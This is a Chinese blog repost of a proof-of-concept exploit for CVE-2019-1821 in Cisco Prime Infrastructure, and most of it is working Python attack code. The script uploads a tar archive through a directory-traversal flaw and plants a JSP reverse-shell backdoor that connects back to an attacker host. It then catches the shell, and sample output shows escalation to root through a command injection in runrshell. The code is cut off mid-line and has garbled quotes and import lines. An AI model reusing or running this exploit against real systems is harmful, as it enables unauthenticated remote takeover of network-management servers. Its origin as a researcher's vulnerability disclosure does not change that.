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[EXP]CVE-2019-1821 Cisco Prime Infrastructure思科未授权远程代码执行漏洞

作者:互联网

CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html

Cscan思科扫描插件 (IP/Port/HostName/Boot/Version)
https://www.cnblogs.com/k8gege/p/10679491.html

CVE-2019-1821 Exploit

#!/usr/bin/python

“”"
Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
Steven Seeley (mr_me) of Source Incite - 2019
SRC: SRC-2019-0034
CVE: CVE-2019-1821

Example:

saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444

saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192.168.100.123
(+) pop thy shell!
python -c ‘import pty; pty.spawn("/bin/bash")’
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell ‘" && /bin/sh #’
/opt/CSCOlumos/bin/runrshell ‘" && /bin/sh #’
sh-4.1# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
sh-4.1# exit
exit
exit
[prime@piconsole CSCOlumos]$ exit
exit
exit
“”"

import sys
import socket
import requests
import tarfile
import telnetlib
from threading import Thread
from cStringIO import StringIO
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def _build_tar(ls, lp):
“”"
build the tar archive without touching disk
“”"
f = StringIO()
b = _get_jsp(ls, lp)
t = tarfile.TarInfo("…/…/opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")
t.size = len(b)
with tarfile.open(fileobj=f, mode=“w”) as tar:
tar.addfile(t, StringIO(b))
return f.getvalue()

def _get_jsp(ls, lp):
jsp = “”"<%@page import=“java.lang."%>
<%@page import="java.util.
”%>
<%@page import=“java.io."%>
<%@page import="java.net.
”%>
<%
class StreamConnector extends Thread
{
InputStream sv;
OutputStream tp;
StreamConnector( InputStream sv, OutputStream tp )
{
this.sv = sv;
this.tp = tp;
}
public void run()
{
BufferedReader za = null;
BufferedWriter hjr = null;
try
{
za = new BufferedReader( new InputStreamReader( this.sv ) );
hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );
char buffer[] = new char[8192];
int length;
while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )
{
hjr.write( buffer, 0, length );
hjr.flush();
}
} catch( Exception e ){}
try
{
if( za != null )
za.close();
if( hjr != null )
hjr.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath = new String("/bin/sh");
Socket socket = new Socket(“IP”, PORT);
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>"""
return jsp.replace(“IP”, ls).replace(“PORT”, str(lp))

def handler(lp):
“”"
This is the client handler, to catch the connectback
“”"
print “(+) starting handler on port %d” % lp
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((“0.0.0.0”, lp))
s.listen(1)
conn, addr = s.accept()
print “(+) connection from %s” % addr[0]
t.sock = conn
print “(+) pop thy shell!”
t.interact()

def exec_code(t, lp):
“”"
This function threads the client handler and sends off the attacking payload
“”"
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
r = requests.get(“https://%s/si.jsp” % t, verify=False)

def we_can_upload(t, ls, lp):
“”"
This is where we take advantage of the vulnerability
“”"
td = _build_tar(ls, lp)
bd = {‘files’: (‘si.tar’, td)}
h = {
‘Destination-Dir’: ‘tftpRoot’,
‘Compressed-Archive’: “false”,
‘Primary-IP’ : ‘127.0.0.1’,
‘Filecount’ : “1”,
‘Filename’: “si.tar”,
‘Filesize’ : str(len(td)),
}
r = requests.post(“https://%s:8082/servlet/UploadServlet” % t, headers=h, files=bd, verify=False)
if r.status_code == 200:
return True
return False

def main():
if len(sys.argv) != 3:
print “(+) usage: %s <target> <connectback:port>” % sys.argv[0]
print “(+) eg: %s 192.168.100.123 192.168.100.2:4444” % sys.argv[0]
sys.exit(-1)
t = sys.argv[1]
cb = sys.argv[2]
if not “:” in cb:
print “(+) using default connectback port 4444”
ls = cb
lp = 4444
else:
if not cb.split("

标签:Prime,bin,Infrastructure,exit,代码执行,lp,import,new,ls
来源: https://blog.csdn.net/k8gege/article/details/90742503